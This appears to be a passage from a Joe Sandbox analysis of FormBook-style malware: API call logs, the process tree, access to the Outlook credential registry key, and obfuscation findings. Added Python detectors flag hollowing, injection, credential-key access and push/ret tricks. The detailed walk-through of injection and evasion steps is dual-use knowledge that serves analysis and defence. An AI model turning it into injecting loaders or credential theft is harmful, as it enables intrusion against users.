Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401830 3_2_00401830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040C03E 3_2_0040C03E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_004038F3 3_2_004038F3
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00422A4C 3_2_00422A4C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401BD0 3_2_00401BD0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00405653 3_2_00405653
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00420753 3_2_00420753
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE20A8 3_2_00BE20A8
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B090 3_2_00B2B090
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE28EC 3_2_00BE28EC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BEE824 3_2_00BEE824
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1002 3_2_00BD1002
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1F900 3_2_00B1F900
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE22AE 3_2_00BE22AE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCFA2B 3_2_00BCFA2B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4EBB0 3_2_00B4EBB0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD03DA 3_2_00BD03DA
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDDBD2 3_2_00BDDBD2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE2B28 3_2_00BE2B28
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AB40 3_2_00B3AB40
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2841F 3_2_00B2841F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDD466 3_2_00BDD466
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42581 3_2_00B42581
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2D5E0 3_2_00B2D5E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE25DD 3_2_00BE25DD
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B10D20 3_2_00B10D20
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE2D07 3_2_00BE2D07
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE1D55 3_2_00BE1D55
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE2EF7 3_2_00BE2EF7
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B36E30 3_2_00B36E30
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDD616 3_2_00BDD616
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE1FF1 3_2_00BE1FF1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BEDFCE 3_2_00BEDFCE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: String function: 00401980 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: String function: 00B1B150 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E833 NtAllocateVirtualMemory, 3_2_0041E833
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E653 NtCreateFile, 3_2_0041E653
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E703 NtReadFile, 3_2_0041E703
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E783 NtClose, 3_2_0041E783
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B598F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00B598F0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00B59860
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59840 NtDelayExecution,LdrInitializeThunk, 3_2_00B59840
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B599A0 NtCreateSection,LdrInitializeThunk, 3_2_00B599A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00B59910
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A20 NtResumeThread,LdrInitializeThunk, 3_2_00B59A20
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00B59A00
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A50 NtCreateFile,LdrInitializeThunk, 3_2_00B59A50
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B595D0 NtClose,LdrInitializeThunk, 3_2_00B595D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59540 NtReadFile,LdrInitializeThunk, 3_2_00B59540
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B596E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00B596E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00B59660
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B597A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00B597A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00B59780
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00B59FE0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00B59710
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B598A0 NtWriteVirtualMemory, 3_2_00B598A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59820 NtEnumerateKey, 3_2_00B59820
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5B040 NtSuspendThread, 3_2_00B5B040
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B599D0 NtCreateProcessEx, 3_2_00B599D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59950 NtQueueApcThread, 3_2_00B59950
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A80 NtOpenDirectoryObject, 3_2_00B59A80
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A10 NtQuerySection, 3_2_00B59A10
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5A3B0 NtGetContextThread, 3_2_00B5A3B0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59B00 NtSetValueKey, 3_2_00B59B00
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B595F0 NtQueryInformationFile, 3_2_00B595F0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5AD30 NtSetContextThread, 3_2_00B5AD30
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59520 NtWaitForSingleObject, 3_2_00B59520
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59560 NtWriteFile, 3_2_00B59560
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B596D0 NtCreateKey, 3_2_00B596D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59610 NtEnumerateValueKey, 3_2_00B59610
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59670 NtQueryInformationProcess, 3_2_00B59670
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59650 NtQueryValueKey, 3_2_00B59650
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59730 NtQueryVirtualMemory, 3_2_00B59730
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5A710 NtOpenProcessToken, 3_2_00B5A710
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59770 NtSetInformationFile, 3_2_00B59770
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5A770 NtOpenThread, 3_2_00B5A770
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59760 NtOpenProcess, 3_2_00B59760
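The NT stubs listed above are the raw primitives behind the report's process hollowing and APC-injection signatures: NtCreateProcessEx and NtSuspendThread give a dormant target, NtUnmapViewOfSection evicts its image, NtCreateSection/NtMapViewOfSection and NtWriteVirtualMemory place the payload, and NtSetContextThread, NtQueueApcThread and NtResumeThread hand control to it. Because mcwfy.exe reaches these stubs through its own executable copy of ntdll (the wntdll.pdb strings found in its 0x00AF0000 region further down), user-mode API hooks never see the calls; a kernel-side or sandbox syscall trace does. As an added example, not code from Joe Sandbox or from the sample, the Python matcher below flags those ordered call sequences in a per-process trace. The trace is constructed from the API names above, the PID numbers are illustrative, and NtCreateUserProcess is included only because CreateProcess itself goes through that stub on current Windows.

```python
"""Flag process-hollowing and APC-injection call sequences in a per-process
syscall trace.  Added example for this report (not sandbox code); the trace
below is constructed from the Nt* names in the listing and is not report output."""
from collections import defaultdict

# Each rule is an ordered list of steps; each step is the set of APIs that
# satisfy it.  Steps must occur in order but need not be adjacent, because a
# loader interleaves bookkeeping calls (NtClose, NtQueryInformationProcess, ...).
RULES = {
    "process_hollowing": [
        {"NtCreateProcessEx", "NtCreateUserProcess"},   # child created (suspended)
        {"NtUnmapViewOfSection"},                        # its original image evicted
        {"NtMapViewOfSection", "NtWriteVirtualMemory"},  # replacement image placed
        {"NtSetContextThread"},                          # thread entry redirected
        {"NtResumeThread"},                              # payload runs
    ],
    "apc_thread_injection": [
        {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx"},  # target acquired
        {"NtMapViewOfSection", "NtAllocateVirtualMemory"},       # code lands in target
        {"NtQueueApcThread"},                                    # APC points at it
        # no NtResumeThread step: an already-alertable thread needs no resume
    ],
}


def match_in_order(calls, steps):
    """Greedy in-order match of steps against calls.  Returns the index of the
    call that completed the match, or -1 if the sequence never completes."""
    i = 0
    for pos, api in enumerate(calls):
        if api in steps[i]:
            i += 1
            if i == len(steps):
                return pos
    return -1


def classify(trace):
    """trace: iterable of (pid, api).  Returns {pid: [rule, ...]} for every pid
    whose call order satisfies at least one rule."""
    per_pid = defaultdict(list)
    for pid, api in trace:
        per_pid[pid].append(api)
    hits = {}
    for pid, calls in per_pid.items():
        matched = [name for name, steps in RULES.items()
                   if match_in_order(calls, steps) >= 0]
        if matched:
            hits[pid] = matched
    return hits


# Constructed trace (not sandbox output): PID 3 hollows a child, PID 6 only
# does file I/O, PID 7 allocates, writes and queues an APC without hollowing.
CONSTRUCTED_TRACE = [
    (3, "NtCreateProcessEx"), (3, "NtQueryInformationProcess"),
    (3, "NtReadVirtualMemory"), (3, "NtUnmapViewOfSection"),
    (3, "NtCreateSection"), (3, "NtMapViewOfSection"), (3, "NtMapViewOfSection"),
    (3, "NtWriteVirtualMemory"), (3, "NtGetContextThread"),
    (3, "NtSetContextThread"), (3, "NtResumeThread"), (3, "NtClose"),
    (6, "NtCreateFile"), (6, "NtReadFile"), (6, "NtClose"),
    (7, "NtOpenProcess"), (7, "NtAllocateVirtualMemory"),
    (7, "NtWriteVirtualMemory"), (7, "NtQueueApcThread"), (7, "NtResumeThread"),
]

if __name__ == "__main__":
    for pid, rules in classify(CONSTRUCTED_TRACE).items():
        print(f"pid {pid}: {', '.join(rules)}")
```

Debuggers and some endpoint agents legitimately call NtSetContextThread and NtResumeThread on other processes; the discriminating step is NtUnmapViewOfSection on a child the same process just created, which is why the hollowing rule keeps it mandatory while the APC rule stays looser.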
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\mcwfy.exe C5E0F86A68DCBD03B9A506768F86C385C360D3CF67B9CC0B5760F7B3F1D91F48
Source: u8QPnVhq0N.exe ReversingLabs: Detection: 46%
Source: u8QPnVhq0N.exe Virustotal: Detection: 48%
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File read: C:\Users\user\Desktop\u8QPnVhq0N.exe Jump to behavior
Source: u8QPnVhq0N.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\u8QPnVhq0N.exe C:\Users\user\Desktop\u8QPnVhq0N.exe
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe Jump to behavior
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File created: C:\Users\user\AppData\Local\Temp\nsl6A3D.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/5@12/10
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
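Read together, the process tree and this registry access are the whole FormBook chain: the dropper (its nsl6A3D.tmp temp file and entry-point call chain are characteristic of an NSIS installer) writes mcwfy.exe to %TEMP% and runs it with the dropped data file ytljtt.f as its only argument; mcwfy.exe re-launches itself to get a clean child to hollow; the payload, once inside explorer.exe, starts an argument-less 32-bit system binary (autoconv.exe and cmstp.exe here) and migrates into it; and it is that system binary, cmstp.exe, that opens the Outlook profile key where stored mail credentials live. As an added example, not Joe Sandbox output, the Python below turns those three observations into rules over process-creation and registry events. The event dicts are constructed from the lines above, and their field names are an assumed schema rather than any particular EDR's format.

```python
"""Flag the FormBook-style execution chain from process-creation and registry
events.  Added example for this report, not sandbox code.  The event dicts are
constructed to mirror the process tree and registry access in the report; the
field names (kind, parent, image, cmdline, key) are an assumed schema."""
import ntpath

# Heuristic: anything under the user profile is writable by the user.
USER_WRITABLE_PREFIXES = ("c:\\users\\",)
SYSWOW64 = "c:\\windows\\syswow64"


def bare_cmdline(cmdline, image):
    """True when the command line is just the image path with no arguments.
    A system binary that explorer.exe starts for a user normally carries an
    argument (a document, an .inf, a switch); an injected launcher passes none."""
    return cmdline.strip().strip('"').lower() == image.lower()


def detect(events):
    """Return [(rule_name, image)] for every event that trips a rule."""
    findings = []
    for ev in events:
        image = ev["image"]
        low = image.lower()
        if ev["kind"] == "process":
            parent = ev["parent"].lower()
            # 1. a user-writable executable re-launching itself: the usual
            #    "spawn a child copy, then hollow or inject into it" step
            if parent == low and low.startswith(USER_WRITABLE_PREFIXES):
                findings.append(("self_spawn_from_user_dir", image))
            # 2. explorer.exe starting an argument-less 32-bit system binary:
            #    explorer has no reason to run cmstp.exe or autoconv.exe bare
            if (ntpath.basename(parent) == "explorer.exe"
                    and ntpath.dirname(low) == SYSWOW64
                    and bare_cmdline(ev["cmdline"], image)):
                findings.append(("explorer_spawns_bare_syswow64", image))
        elif ev["kind"] == "registry":
            # 3. a Windows system binary reading Outlook profile keys
            if ("\\outlook\\profiles" in ev["key"].lower()
                    and low.startswith("c:\\windows\\")):
                findings.append(("mail_profile_access_from_system_binary", image))
    return findings


# Constructed events mirroring the report's process tree, plus one benign
# explorer.exe launch (notepad with a document argument) as a control.
CONSTRUCTED_EVENTS = [
    {"kind": "process", "parent": r"C:\Users\user\Desktop\u8QPnVhq0N.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\mcwfy.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f'},
    {"kind": "process", "parent": r"C:\Users\user\AppData\Local\Temp\mcwfy.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"kind": "process", "parent": r"C:\Users\user\AppData\Local\Temp\mcwfy.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\mcwfy.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\mcwfy.exe"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\SysWOW64\autoconv.exe",
     "cmdline": r"C:\Windows\SysWOW64\autoconv.exe"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\SysWOW64\cmstp.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmstp.exe"},
    {"kind": "registry", "image": r"C:\Windows\SysWOW64\cmstp.exe",
     "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
]

if __name__ == "__main__":
    for rule, image in detect(CONSTRUCTED_EVENTS):
        print(f"{rule}: {image}")
```

Rule 2 is the one worth tuning in production: explorer.exe is the parent of almost everything a user launches, so the argument-less test and the SysWOW64 directory (a 32-bit payload can only inject into 32-bit hosts) carry the signal, and the conhost.exe child of mcwfy.exe is correctly ignored as console plumbing.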
Source: u8QPnVhq0N.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Unpacked PE file: 3.2.mcwfy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00410A64 push ecx; ret 1_2_00410A77
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040A846 push cs; retf 3_2_0040A847
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00411320 push ds; retf 3_2_00411322
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040DC2C pushfd ; iretd 3_2_0040DC3A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040B4FA push ecx; ret 3_2_0040B501
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040AD0D push 255F11F9h; retf 3_2_0040AD18
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041B674 pushad ; retf 3_2_0041B678
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401E20 push eax; ret 3_2_00401E22
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B6D0D1 push ecx; ret 3_2_00B6D0E4
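Every entry above is a push followed by some form of ret: push reg; ret and push imm32; retf jump through the stack instead of with jmp or call, so recursive-descent disassemblers and naive emulators lose the control-flow edge, while push cs; retf, push ds; retf, pushad; retf and pushfd; iretd are mostly junk inserted to derail linear disassembly. The same habit of reading state without an API call shows up in the mov eax, dword ptr fs:[00000030h] entries under Malware Analysis System Evasion: on 32-bit Windows fs:[30h] is the PEB, and a loader that reads BeingDebugged (offset 0x2), NumberOfProcessors (0x64) or NtGlobalFlag (0x68) directly never touches IsDebuggerPresent or GetSystemInfo, which is what the GetPEB, DecisionNodes, ExitProcess chain in that section describes. As an added example, not the sandbox's own detection logic, the Python scanner below finds both patterns in raw 32-bit code bytes from the documented opcode encodings; the sample bytes are constructed, not dumped from mcwfy.exe.

```python
"""Scan raw 32-bit x86 code bytes for two patterns this report flags:
push/ret control-flow obfuscation and PEB reads through fs:[30h].
Added example; CONSTRUCTED_CODE is assembled by hand from documented opcode
encodings and is not a dump of mcwfy.exe."""

# Single-byte PUSH encodings and the RET family that may follow them.
PUSH_ONE = {
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
    0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
    0x60: "pushad", 0x9C: "pushfd",
}
RET = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_DISP = b"\x30\x00\x00\x00"          # disp32 = 0x30 -> TEB.ProcessEnvironmentBlock


def scan(code, base=0):
    """Linear scan; returns [(address, kind, text)] with kind 'push_ret' or
    'peb_read'.  No disassembly is attempted, so hits inside data are possible."""
    hits = []
    n = len(code)
    i = 0
    while i < n:
        b = code[i]
        # push r32 / sreg / pushad / pushfd ; ret*  (push a target, "return" into it)
        if b in PUSH_ONE and i + 1 < n and code[i + 1] in RET:
            hits.append((base + i, "push_ret", f"{PUSH_ONE[b]}; {RET[code[i + 1]]}"))
            i += 2
            continue
        # 68 imm32 ; ret*  : absolute jump via the stack
        if b == 0x68 and i + 5 < n and code[i + 5] in RET:
            imm = int.from_bytes(code[i + 1:i + 5], "little")
            hits.append((base + i, "push_ret", f"push {imm:08X}h; {RET[code[i + 5]]}"))
            i += 6
            continue
        # 64 A1 30 00 00 00 : mov eax, fs:[30h]  (short form, eax only)
        if code[i:i + 6] == b"\x64\xA1" + PEB_DISP:
            hits.append((base + i, "peb_read", "mov eax, dword ptr fs:[00000030h]"))
            i += 6
            continue
        # 64 8B /r with ModRM mod=00 rm=101 (disp32) and disp32 == 0x30 : mov r32, fs:[30h]
        if code[i:i + 2] == b"\x64\x8B" and i + 6 < n:
            modrm = code[i + 2]
            if modrm & 0xC7 == 0x05 and code[i + 3:i + 7] == PEB_DISP:
                reg = REG32[(modrm >> 3) & 7]
                hits.append((base + i, "peb_read", f"mov {reg}, dword ptr fs:[00000030h]"))
                i += 7
                continue
        i += 1
    return hits


# Constructed bytes: a normal prologue, then the flagged patterns interleaved.
CONSTRUCTED_CODE = bytes([
    0x55, 0x8B, 0xEC,                           # push ebp; mov ebp, esp
    0x64, 0xA1, 0x30, 0x00, 0x00, 0x00,         # mov eax, fs:[30h]
    0x8B, 0x40, 0x0C,                           # mov eax, [eax+0Ch]  (PEB.Ldr)
    0x0E, 0xCB,                                 # push cs; retf
    0x68, 0xF9, 0x11, 0x5F, 0x25, 0xCB,         # push 255F11F9h; retf
    0x64, 0x8B, 0x0D, 0x30, 0x00, 0x00, 0x00,   # mov ecx, fs:[30h]
    0x9C, 0xCF,                                 # pushfd; iretd
    0x51, 0xC3,                                 # push ecx; ret
    0xC3,                                       # ret
])

if __name__ == "__main__":
    for addr, kind, text in scan(CONSTRUCTED_CODE, base=0x00400000):
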